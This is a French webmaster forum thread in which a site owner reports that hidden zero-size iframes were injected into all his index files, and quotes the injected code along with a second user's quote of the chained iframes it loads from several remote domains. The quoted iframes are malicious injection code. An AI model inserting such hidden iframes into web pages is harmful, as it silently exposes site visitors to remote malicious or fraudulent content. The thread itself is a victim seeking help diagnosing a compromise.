On s'est fait hacker ?

F
Franck
Nouveau WRInaute
Bonjour,

Nous étions content que notre site soit valide soit valide XHTML1...

Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...

Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...

Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?

Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.

Voici le code en question qui était inséré en dehors du body :-((


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


Merci pour votre aide !!!

Franck
 
F
Franck
Nouveau WRInaute
oui ça aurait un rapport avec joomla...?

Mais on l'a installé il y a 6 mois et les fichiers ont été modifiés il y a 10 jours... :-(
 
K
kool76
Nouveau WRInaute
J'allais faire la même remarque :)

Et compléter par le code source de la page de la frame :

Code: 
<iframe width=0 height=0 src=http://www.donefind.com/smartppc/portal.php?affzb=1&username=yoho></iframe><iframe width=0 height=0 src=http://www.hadbest.net/search/portal.php?affzb=1&username=xiz></iframe><iframe width=0 height=0 src=http://www.slowern.com/search/portal.php?username=had></iframe>

Un hack qui ne sert que des intérêts financiers je pense...
 
david96
david96
WRInaute passionné
J'ai regardé ton code source et je n'y ai point vu de <iframe....> après le </body>
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant :lol: )
 
F
Franck
Nouveau WRInaute
Sur notre site principal c'est normal on l'a retiré...

Mais c'est encore sur des sous-repertoires de cms que l'on a testé...

En fait ce code c'est inseré dans tous nos fichiers index...

Exemple d'url ou on ne l'a pas encore retiré :

Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/

c'est tout en bas du code de cette page..
 
david96
david96
WRInaute passionné
Bon sang mais comment peut-il intégrer ce code en écriture sur vos fichiers ?
Vérifie tes CHMOD sur ton FTP au cas où !
En sachant le comment on pourra éradiquer le hacker, reste à savoir comment il fait ? :?
 
F
Franck
Nouveau WRInaute
Je me disais qu'il avait peut être développe un script qui exploite les failles de sécurité et qui modifie les fichiers index...

ça lui génère peut être des milliers de liens !!!

En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...
 
Vous devez vous connecter ou vous inscrire pour répondre ici.
1.fr
Discussions similaires
K
QUoi faire si on est victime d'un hacker ???
Réponses
5
Affichages
5K
rollback
R
J
Des visiteurs de pays étrangers affluent sur mon site et tentent de le hacker.Que faire?
Réponses
7
Affichages
3K
Marie-Aude
Marie-Aude
O
Mon site se fait hacker, help
Réponses
9
Affichages
2K
cduray
C
S
Google offre 20 000 dollars au hacker qui vaincra Chrome
Réponses
9
Affichages
3K
fredm
fredm
S
Matt Cutts propose 2000 dollars pour hacker le Kinect
Réponses
3
Affichages
2K
ap34df
A
G
Bane IP : 72.46.130.186 - Hacker BOT
Réponses
3
Affichages
3K
hurdleur
H
KOogar
Visite d'un hacker doué
Réponses
6
Affichages
1K
KOogar
KOogar
H
message d'un hacker
Réponses
46
Affichages
7K
NoGlob
N
V
Site hacker que faut il faire...
Réponses
4
Affichages
2K
vbmarh
V
A
Un de mes sites s'est fait hacker !
Réponses
7
Affichages
1K
Alifba
A
A
En s'attaquant au spaM on se fait Hacker son site
Réponses
19
Affichages
15K
Jeviensderio
J
titiplanti
victime d'un hacker (catégorie plaisantin ?)
Réponses
5
Affichages
1K
titiplanti
titiplanti
B
Ichiro 2.0, Mass deleter, hacker?
Réponses
10
Affichages
2K
bproductiv
B
V
Du hacker dans l'air ?
Réponses
5
Affichages
2K
vince1286
V
T
Ne pas se faire hacker son site
Réponses
12
Affichages
4K
fredoche25
F
julienr
on cherche à hacker mon ssh
Réponses
11
Affichages
3K
MirageDemonAsh
M
passion
Les dangers d'être "hacker"
Réponses
8
Affichages
3K
ACth
A
M
Libwww-perl 5.69 : qu'elle est ce bot de hacker ?
Réponses
23
Affichages
8K
Deus Ex Machina
D
P
Hacker ou autre chose ?
Réponses
6
Affichages
2K
ecocentric
E
T
Sécurisé son site web contre les Hacker
Réponses
8
Affichages
5K
Borower
B
Haut